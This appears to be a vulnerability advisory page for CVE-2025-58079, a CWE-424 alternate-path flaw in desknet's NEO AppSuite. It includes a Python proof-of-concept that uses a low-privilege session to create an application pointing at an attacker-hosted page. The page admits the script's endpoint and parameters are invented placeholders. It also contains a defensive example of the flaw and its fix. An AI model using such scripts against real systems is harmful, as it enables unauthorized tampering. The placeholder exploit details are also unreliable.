Improper Protection of Alternate Path (CWE-424) in the AppSuite of desknet's NEO V4.0R1.0 to V9.0R2.0 allows an attacker to create malicious AppSuite applications.
CVSS Details
CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Configurations (Affected Products)
desknet's NEO V4.0R1.0
desknet's NEO V4.0R2.0
desknet's NEO V5.0R1.0
desknet's NEO V5.0R2.0
desknet's NEO V6.0R1.0
desknet's NEO V6.0R2.0
desknet's NEO V7.0R1.0
desknet's NEO V7.0R2.0
desknet's NEO V8.0R1.0
desknet's NEO V8.0R2.0
desknet's NEO V9.0R1.0
desknet's NEO V9.0R2.0
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-58079 PoC - desknet's NEO AppSuite Improper Protection of Alternate Path
# Vulnerability: CWE-424 Improper Protection of Alternate Path
# Affected: desknet's NEO V4.0R1.0 to V9.0R2.0
# CVSS: 4.3 (MEDIUM) - AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
#
# Note: the advisory does not publish the affected endpoint or request
# parameters. The path and form fields used below are placeholders and must
# be replaced with the values observed during authorized testing of a real
# instance; they are not taken from the vendor advisory.
import requests

TARGET_URL = "https://target-desknets-neo.example.com"
# Session cookie of a logged-in, low-privilege (non-administrator) user.
# The vector is PR:L: a valid login is required, but no elevated role.
SESSION_COOKIE = "JSESSIONID=authenticated_low_privilege_session"


def exploit_alternate_path() -> bool:
    """
    Exploit the alternate path in AppSuite to create a malicious application.
    The vulnerability allows low-privilege users to bypass the normal
    authorization check and create AppSuite applications through an
    unprotected alternate path.
    """
    session = requests.Session()
    session.headers.update({
        "Cookie": SESSION_COOKIE,
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0",
    })

    # Step 1: the alternate/unprotected AppSuite creation endpoint.
    # Placeholder path: the primary (UI) creation route enforces the
    # privilege check, the alternate route does not.
    alternate_endpoint = f"{TARGET_URL}/appsuite/alt/create"

    # Step 2: application definition that points at attacker-controlled content
    malicious_payload = {
        "appName": "LegitimateLookingApp",
        "appType": "widget",
        "appUrl": "https://attacker.example.com/malicious.html",
        "appIcon": "/images/normal_icon.png",
        "appCategory": "utility",
        "appDescription": "A useful utility widget",
        # Placeholder flags; a real alternate path may need no such parameters,
        # since the defect is a missing check, not a check that can be switched off
        "internalBypass": "true",
        "skipAuthCheck": "1",
    }

    # Step 3: POST the form to the alternate path
    response = session.post(alternate_endpoint, data=malicious_payload, timeout=30)

    # A 200 with "success" in the body is only a heuristic; confirm the result
    # by checking whether the application now appears in the AppSuite listing.
    if response.status_code == 200 and "success" in response.text.lower():
        print("[+] Malicious AppSuite application created successfully!")
        print(f"[+] Response: {response.text}")
        return True
    print(f"[-] Exploit failed. Status: {response.status_code}")
    return False


if __name__ == "__main__":
    exploit_alternate_path()
```
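The description above and the PoC both reduce to the same CWE-424 pattern: the privileged operation (creating an AppSuite application) is guarded on the primary route, but a second route reaches the same operation without repeating the guard. The following is an added, generic illustration of that pattern and of the usual fix; it is example code written for this page, not desknet's NEO source, and every class and function name (VulnerableAppSuite, HardenedAppSuite, create_via_import, can_create_apps) is hypothetical.

```python
# Added illustration of CWE-424 (Improper Protection of Alternate Path).
# Generic example code, not desknet's NEO source; all names are hypothetical.
from dataclasses import dataclass, field


class Forbidden(Exception):
    """Raised when the caller lacks the right for an operation."""


@dataclass(frozen=True)
class User:
    name: str
    can_create_apps: bool  # hypothetical "may create AppSuite applications" right


@dataclass
class AppStore:
    """Backing store for application definitions (hypothetical)."""
    apps: dict = field(default_factory=dict)

    def save(self, name: str, url: str) -> None:
        self.apps[name] = url


# --- Vulnerable: the authorization check lives in the UI handler only -------

class VulnerableAppSuite:
    def __init__(self) -> None:
        self.store = AppStore()

    def create_via_ui(self, user: User, name: str, url: str) -> None:
        """Primary path: the form handler checks the right before saving."""
        if not user.can_create_apps:
            raise Forbidden(f"{user.name} may not create applications")
        self.store.save(name, url)

    def create_via_import(self, user: User, spec: dict) -> None:
        """Alternate path (a bulk import or legacy endpoint, say) that writes
        straight to the store. The check is never repeated here: CWE-424."""
        self.store.save(spec["appName"], spec["appUrl"])


# --- Hardened: the check sits in the operation itself, not in any one route --

class HardenedAppSuite:
    def __init__(self) -> None:
        self.store = AppStore()

    def _create(self, user: User, name: str, url: str) -> None:
        """Single choke point; every entry route must go through it."""
        if not user.can_create_apps:
            raise Forbidden(f"{user.name} may not create applications")
        self.store.save(name, url)

    def create_via_ui(self, user: User, name: str, url: str) -> None:
        self._create(user, name, url)

    def create_via_import(self, user: User, spec: dict) -> None:
        self._create(user, spec["appName"], spec["appUrl"])


def attempt_alternate_path(suite, user: User) -> bool:
    """Use the alternate route as `user`; True if an application was created."""
    # Constructed request body, modelled on the PoC above
    spec = {"appName": "LegitimateLookingApp",
            "appUrl": "https://attacker.example.com/malicious.html"}
    try:
        suite.create_via_import(user, spec)
    except Forbidden:
        return False
    return spec["appName"] in suite.store.apps


if __name__ == "__main__":
    low_priv = User("alice", can_create_apps=False)
    print("vulnerable:", attempt_alternate_path(VulnerableAppSuite(), low_priv))
    print("hardened:  ", attempt_alternate_path(HardenedAppSuite(), low_priv))
```

The fix worth noting is structural rather than a patch to one route: as long as the check is attached to a handler, any new or forgotten entry point (API, import, mobile view) silently reopens the hole, whereas a check enforced inside the operation covers routes that do not exist yet.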